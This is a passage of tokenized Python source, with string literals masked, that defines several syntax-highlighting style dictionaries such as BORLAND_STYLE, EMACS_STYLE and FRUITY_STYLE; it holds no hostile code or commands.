'<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , 
<EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> BORLAND_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : 
'<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } 
<EOL> COLORFUL_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , 
<EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> EMACS_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : 
'<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> FRIENDLY_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> 
'<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' 
, <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> FRUITY_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : 
'<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> IGOR_STYLE = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> 
'<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:0>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> LOVELACE_STYLE = 
